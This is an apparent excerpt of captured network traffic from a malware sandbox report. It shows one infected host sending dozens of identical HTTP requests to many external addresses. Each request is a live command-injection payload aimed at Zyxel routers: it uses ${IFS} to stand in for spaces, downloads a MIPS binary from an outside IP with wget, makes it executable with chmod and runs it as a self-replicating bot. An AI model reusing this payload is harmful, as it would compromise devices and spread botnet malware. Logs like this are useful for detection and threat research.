                                            Jan 14, 2024 15:50:31.269220114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2064192.168.2.2335270193.171.182.27443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.269238949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2065192.168.2.233446032.44.184.37443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.269254923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2066192.168.2.233293017.198.41.120443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.269267082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2067192.168.2.2345100205.201.225.147443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.269308090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2068192.168.2.234654281.48.80.201443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.269321918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2069192.168.2.2335444147.181.50.241443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.269362926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2070192.168.2.2340012100.183.188.15443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.269407988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2071192.168.2.2341378217.225.216.102443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.269418955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2072192.168.2.2338690124.201.173.30443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.269443035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2073192.168.2.2358144132.30.33.38443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.269481897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2074192.168.2.233431086.240.219.126443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.269490004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2075192.168.2.234801888.43.134.32443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.269532919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2076192.168.2.235178081.115.163.229443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.269565105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2077192.168.2.234690049.118.60.62443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.269582987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2078192.168.2.233910668.107.227.66443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.269623995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2079192.168.2.2353144135.182.245.249443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.269701004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2080192.168.2.2336686141.154.238.191443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.269705057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2081192.168.2.2340168197.34.146.171443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.269726992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2082192.168.2.234421871.241.202.154443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.269754887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2083192.168.2.235103646.110.12.47443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.269808054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2084192.168.2.2350304220.36.99.47443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.269826889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2085192.168.2.234800862.186.28.164443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.269856930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2086192.168.2.2335564165.213.29.223443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.269907951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2087192.168.2.233500238.112.206.136443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.269928932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2088192.168.2.2338480207.84.0.7443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.269959927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2089192.168.2.2346970195.163.236.253443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.269990921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2090192.168.2.2336774207.24.46.34443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.270019054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2091192.168.2.2358816204.180.198.172443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.270034075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2092192.168.2.235155442.168.255.91443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.270055056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2093192.168.2.2360776169.206.172.200443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.270088911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2094192.168.2.2351118130.214.154.164443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.270112991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2095192.168.2.2340314169.196.224.82443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.270140886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2096192.168.2.2340832144.195.186.32443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.270164013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2097192.168.2.234704647.39.178.71443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.270203114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2098192.168.2.2348446108.79.155.255443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.270236015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2099192.168.2.235383873.198.236.240443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.270260096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2100192.168.2.2338572173.19.218.33443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.270303011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2101192.168.2.234846844.128.124.228443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.270314932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2102192.168.2.235871293.90.183.226443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.270374060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2103192.168.2.2341750164.222.100.175443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.270400047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2104192.168.2.2335006222.252.46.67443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.270469904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2105192.168.2.2338960188.146.78.60443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.270478964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2106192.168.2.2338996160.111.242.213443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.270490885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2107192.168.2.235859879.236.200.10443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.270517111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2108192.168.2.234872641.84.121.143443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.270571947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2109192.168.2.2359812185.106.184.0443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.270589113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2110192.168.2.235294462.77.63.171443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.270612001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2111192.168.2.235330225.176.23.223443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.270646095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2112192.168.2.235224424.236.60.214443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.270688057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2113192.168.2.234913013.28.117.9443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.270729065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2114192.168.2.233327673.16.199.103443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.270755053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2115192.168.2.2340610183.94.39.138443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.270781040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2116192.168.2.2342860217.86.189.158443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.270797014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2117192.168.2.234277665.35.93.23443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.270842075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2118192.168.2.235304486.82.51.196443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.270873070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2119192.168.2.233952432.139.91.17443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.270905972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2120192.168.2.2341302100.59.49.140443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.270931005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2121192.168.2.2342078183.138.179.165443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.270968914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2122192.168.2.2338808115.201.84.179443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.271011114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2123192.168.2.2345668166.190.13.191443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.271040916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2124192.168.2.23572621.194.26.118443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.271104097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2125192.168.2.23381801.240.106.59443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:31.271119118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2126192.168.2.2345976138.58.0.95443
                                            TimestampBytes transferredDirectionData
